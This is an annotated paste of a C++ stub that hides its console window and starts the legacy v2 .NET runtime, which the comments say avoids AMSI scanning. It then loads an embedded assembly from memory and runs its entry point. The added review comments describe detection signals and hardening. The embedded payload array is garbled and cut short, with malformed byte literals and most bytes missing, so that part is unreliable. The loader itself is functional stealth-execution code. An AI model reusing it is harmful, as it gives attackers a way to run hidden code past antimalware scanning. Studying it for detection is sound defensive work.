hamouzix

cl

Feb 24th, 2018
// Preamble and embedded payload of a native CLR-hosting stub.
// NOTE(review): the _AppDomainPtr / _AssemblyPtr / _MethodInfoPtr types used by
// _tmain are not declared by anything visible here; presumably stdafx.h pulls
// them in (typically via an #import of mscorlib.tlb) -- confirm against the project.
#include "stdafx.h"
#include<metahost.h>   // duplicate of the next include; redundant
#include <metahost.h>  // CLR hosting interfaces (ICLRMetaHost, ICLRRuntimeInfo)
#include <iostream>
#pragma comment(lib, "MSCOREE.lib")  // link against the mscoree import library (provides CLRCreateInstance)
using namespace std;
// Size in bytes of the embedded assembly. The same value is repeated as a literal
// in the rawData declaration below and is used for both the SAFEARRAY bound and
// the memcpy length in _tmain, so the three must stay in sync.
#define RAW_ASSEMBLY_LENGTH 16896


// Raw bytes of the managed assembly that _tmain copies into a SAFEARRAY and hands
// to _AppDomain::Load_3.
// NOTE(review): the initializer is truncated and garbled in this paste -- `x0E`
// is missing its leading 0, `0x1` is cut off with no trailing comma, and only a
// few dozen of the declared 16896 bytes are present -- so the listing does not
// compile as shown and the payload cannot be recovered from this page.
// The visible bytes also do not begin with the "MZ" PE signature, so the head
// of the buffer appears to have been elided as well.
// For triage of an intact sample: carve the buffer out of the binary, hash it,
// and inspect it statically in an isolated analysis environment.
unsigned char rawData[16896] = {

0xAB, 0x01, 0x21, 0x01, 0x9D, 0x08, 0xF6, 0x01, 0x2E, 0x00, 0x13, 0x00,
x0E, 0x0E, 0x0E,
0x08, 0x02, 0x0E, 0x02, 0x06, 0x20, 0x03, 0x1C, 0x0E, 0x0E, 0x0E, 0x03,
0x20, 0x00, 0x1C, 0x11, 0x00, 0x08, 0x08, 0x10, 0x0E, 0x10, 0x0E, 0x08,
0x1
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
  20.  
  21.  
  22.  
/*
 * Entry point of a native CLR-hosting stub.
 *
 * Hides the console window, starts the .NET Framework runtime "v2.0.50727"
 * inside this (unmanaged) process, copies rawData into a SAFEARRAY, loads it
 * as an assembly with _AppDomain::Load_3, and invokes the assembly's entry
 * point with a null target and an empty argument array. The managed code is
 * loaded from a byte buffer, so it never has to exist as its own file on disk.
 *
 * Parameters: argc / argv are not used.
 * Returns:    -1 after printing the failing step and blocking on getchar().
 *             On success the function never returns: it spins in an empty
 *             loop, so the trailing `return 0` is unreachable.
 *
 * Review notes (defender view):
 *  - Behaviours visible here that are useful for detection: a native
 *    executable that hides its own console, then loads the CLR and an
 *    assembly from memory. Image-load telemetry for the runtime DLLs in a
 *    process that is not a .NET executable is the usual signal for this
 *    pattern.
 *  - The runtime requested is the legacy v2 CLR. AMSI scanning of assemblies
 *    loaded from byte arrays was added in .NET Framework 4.8, so a load
 *    through the v2 runtime is not covered by it. On current Windows the v2
 *    runtime is only present when the optional .NET Framework 3.5 feature is
 *    installed; leaving it uninstalled where nothing needs it presumably makes
 *    this stub fail at GetRuntime/IsLoadable/GetInterface -- verify locally.
 *  - Every failure path calls getchar() after the console was hidden, so a
 *    failed run leaves an invisible process blocked on stdin.
 *  - On success the empty `while` loop pins one CPU core indefinitely.
 *
 * Review notes (code quality):
 *  - pMetaHost, pRuntimeInfo and pRuntimeHost are raw interface pointers and
 *    are never Release()d on any path; pSafeArray and psaStaticMethodArgs are
 *    never destroyed; retVal is never cleared.
 *  - The results of SafeArrayCreate and SafeArrayCreateVector are not checked
 *    for NULL before use.
 *  - The Invoke_3 failure message prints an HRESULT with %X.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    // Hide the console window before doing anything else; the printf output
    // below is therefore not visible to an interactive user.
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    ICLRMetaHost* pMetaHost = NULL;

    HRESULT hr;

    /* Get the ICLRMetaHost instance, the top-level CLR hosting interface */

    hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (VOID**)&pMetaHost);

    if (FAILED(hr))
    {
        printf("[!] CLRCreateInstance(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] CLRCreateInstance(...) succeeded\n");

    ICLRRuntimeInfo* pRuntimeInfo = NULL;

    /* Get the ICLRRuntimeInfo for the hard-coded legacy runtime version v2.0.50727 */

    hr = pMetaHost->GetRuntime(L"v2.0.50727", IID_ICLRRuntimeInfo, (VOID**)&pRuntimeInfo);

    if (FAILED(hr))
    {
        printf("[!] pMetaHost->GetRuntime(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] pMetaHost->GetRuntime(...) succeeded\n");

    BOOL bLoadable;

    /* Check if the specified runtime can be loaded into this process */

    hr = pRuntimeInfo->IsLoadable(&bLoadable);

    // bLoadable is only read when the call succeeded (short-circuit on FAILED).
    if (FAILED(hr) || !bLoadable)
    {
        printf("[!] pRuntimeInfo->IsLoadable(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] pRuntimeInfo->IsLoadable(...) succeeded\n");

    ICorRuntimeHost* pRuntimeHost = NULL;

    /* Get the ICorRuntimeHost instance used to start the runtime and reach its AppDomain */

    hr = pRuntimeInfo->GetInterface(CLSID_CorRuntimeHost, IID_ICorRuntimeHost, (VOID**)&pRuntimeHost);

    if (FAILED(hr))
    {
        printf("[!] pRuntimeInfo->GetInterface(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] pRuntimeInfo->GetInterface(...) succeeded\n");

    /* Start the CLR inside this process */

    hr = pRuntimeHost->Start();

    if (FAILED(hr))
    {
        printf("[!] pRuntimeHost->Start() failed\n");

        getchar();

        return -1;
    }

    printf("[+] pRuntimeHost->Start() succeeded\n");

    IUnknownPtr pAppDomainThunk = NULL;

    /* Get the default AppDomain as an IUnknown */

    hr = pRuntimeHost->GetDefaultDomain(&pAppDomainThunk);

    if (FAILED(hr))
    {
        printf("[!] pRuntimeHost->GetDefaultDomain(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] pRuntimeHost->GetDefaultDomain(...) succeeded\n");

    _AppDomainPtr pDefaultAppDomain = NULL;

    /* Equivalent of System.AppDomain.CurrentDomain in C# */

    hr = pAppDomainThunk->QueryInterface(__uuidof(_AppDomain), (VOID**)&pDefaultAppDomain);

    if (FAILED(hr))
    {
        printf("[!] pAppDomainThunk->QueryInterface(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] pAppDomainThunk->QueryInterface(...) succeeded\n");

    _AssemblyPtr pAssembly = NULL;

    // Describe a one-dimensional, zero-based byte array sized to the embedded assembly.
    SAFEARRAYBOUND rgsabound[1];

    rgsabound[0].cElements = RAW_ASSEMBLY_LENGTH;

    rgsabound[0].lLbound = 0;

    // NOTE(review): the returned pointer is not checked for NULL here.
    SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound);

    void* pvData = NULL;

    // Lock the array and obtain a pointer to its element storage.
    hr = SafeArrayAccessData(pSafeArray, &pvData);

    if (FAILED(hr))
    {
        printf("[!] SafeArrayAccessData(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] SafeArrayAccessData(...) succeeded\n");

    // Copy the embedded assembly bytes into the SAFEARRAY. Source and
    // destination are both sized by RAW_ASSEMBLY_LENGTH / the literal 16896.
    memcpy(pvData, rawData, RAW_ASSEMBLY_LENGTH);

    hr = SafeArrayUnaccessData(pSafeArray);

    if (FAILED(hr))
    {
        printf("[!] SafeArrayUnaccessData(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] SafeArrayUnaccessData(...) succeeded\n");

    /* Equivalent of System.AppDomain.CurrentDomain.Load(byte[] rawAssembly) */
    // This is the in-memory load: the assembly comes from the byte array, not from a file path.

    hr = pDefaultAppDomain->Load_3(pSafeArray, &pAssembly);

    if (FAILED(hr))
    {
        printf("[!] pDefaultAppDomain->Load_3(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] pDefaultAppDomain->Load_3(...) succeeded\n");

    _MethodInfoPtr pMethodInfo = NULL;

    /* Assembly.EntryPoint Property */

    hr = pAssembly->get_EntryPoint(&pMethodInfo);

    if (FAILED(hr))
    {
        printf("[!] pAssembly->get_EntryPoint(...) failed\n");

        getchar();

        return -1;
    }

    printf("[+] pAssembly->get_EntryPoint(...) succeeded\n");

    // Receives the entry point's return value; never read or cleared afterwards.
    VARIANT retVal;
    ZeroMemory(&retVal, sizeof(VARIANT));

    // Target object for the invocation: VT_NULL, i.e. no instance.
    VARIANT obj;
    ZeroMemory(&obj, sizeof(VARIANT));
    obj.vt = VT_NULL;

    //TODO! Change cElement to the number of Main arguments
    // As written, the argument vector has zero elements.
    SAFEARRAY *psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 0);

    /* EntryPoint.Invoke(null, new object[0]) */

    hr = pMethodInfo->Invoke_3(obj, psaStaticMethodArgs, &retVal);

    if (FAILED(hr))
    {
        // Only failure path that reports the HRESULT value.
        printf("[!] pMethodInfo->Invoke_3(...) failed, hr = %X\n", hr);

        getchar();

        return -1;
    }

    printf("[+] pMethodInfo->Invoke_3(...) succeeded\n");

    // Empty infinite loop: keeps the process alive after the entry point
    // returns, at the cost of a fully busy thread.
    while(1==1){}

    // Unreachable because of the loop above.
    return 0;
}